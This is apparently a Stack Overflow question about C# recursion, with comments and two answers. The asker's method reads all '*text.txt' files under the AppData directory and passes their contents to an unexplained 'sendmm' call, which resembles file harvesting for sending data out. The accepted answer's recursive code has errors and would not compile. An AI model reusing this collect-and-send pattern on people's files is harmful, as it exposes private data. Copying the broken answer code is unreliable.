# Why is the if statement being executed before the foreach loop?

Tags: c#

I had a problem before and now that I solved it, I can't solve this one.

**debugging picture**

[image]

For some reason the if statement is called BEFORE the foreach loop and because of that, the variable that I wanted to send AFTER the loop is empty. How can I fix it? I thought code is always read from top to the bottom?

At the end, the list contains everything it should but the if statement is not being called a second time...

```
        public static void GetAllFiles(string sDir)
    {
        List < string > datas = new List<string>();
        foreach (string dir in Directory.GetDirectories(sDir))
        {
            try
            {
                foreach (string file in Directory.GetFiles(dir, "*text.txt"))
                {
                    string var = File.ReadAllText(file);
                    datas.Add(var);
                }
                GetAllFiles(dir);
            }
            catch
            {
            }
        }
        if (datas != null)
        {
            string dets = String.Join("\n\n", datas.ToArray());
            sendmm(dets);
        }
    }
```

appdata directory is being passed

Comment: Screenshots of a texteditor are a very poor substitute for pasting the actual code into the question editor.

Comment: Paste the code so we can look at it and maybe we can help.

Comment: edited, sorry for that

Comment: The only reason the IF statement would be executed "first" is if there are no directories in your path. Have you confirmed the path is correct and that is contains FOLDERS? This will not rint the files in sDir - only the files in any subfolders. If sDir has no folders - nothing will print

Comment: Have you rebuilt your project and debugged it? I doubt the if-statement is executed before the loop, except you´re junmping into the method within a loop or something similar.

Comment: This is bad recursion, also. The list gets reset with every run.

Comment: Not related to the problem but do you know that Directory.GetFiles could return all the files in the directory subtree without the need of recursion?

Comment: Damn- downvoted before I could finish my answer lol. Can y'all give me a minute to finish it? I have to close the screen to go get more code, then come back and edit. My downvoted answer shows you how to do what you want either with or without recusrion

Answer (score 0, accepted):

The easiest way to do this is:

```
public static void GetAllFiles(string sDir)
{
  Console.WriteLine(String.Join("\n\n",Directory.GetFiles(sDir, "*.*", SearchOption.AllDirectories)));
}
```

There is no need for recursion - but since you used recursion in your question, you may be simplifying, this is how you'd use it if you need recursion for some other purpose.

```
List < string > datas = new List<string>();

public static void GetAllFiles(string sDir)
{     datas = new List<string>();
      datas.AddRange(Directory.GetFiles(sDir);
    foreach (string dir in Directory.GetDirectories(sDir))
    {
       recursiveSearch();           
    }
    if (datas != null)
    {
        string dets = String.Join("\n\n", datas.ToArray());
        sendmm(dets);
    }
}
private string recursiveSearch(string dir)
{
   datas.AddRange(Directory.GetFiles(dir));
   foreach(string directory in dir.GetDirectories())
   {
       recursiveSearch(directory);
   }
}
```

Answer (score 1):

Your method `GetAllFiles` is calling itself inside the `foreach` loop and you are reseting the list at the start of the method so that's why you are seeing an empty `datas` list after the `foreach` block.

Your position in the debugging picture is inside a second (or even deeper) `GetAllFiles` call where the `Directory.GetDirectories(sDir)` call did not return any directories anymore. You were already inside some subdirectory that has no more directories.

To better understand what is happening open the `Call Stack` window in your IDE and click up/down the stack. You should see at least two `GetAllFiles` entries in the stack. Click on them and inspect your `datas` list and other local variables.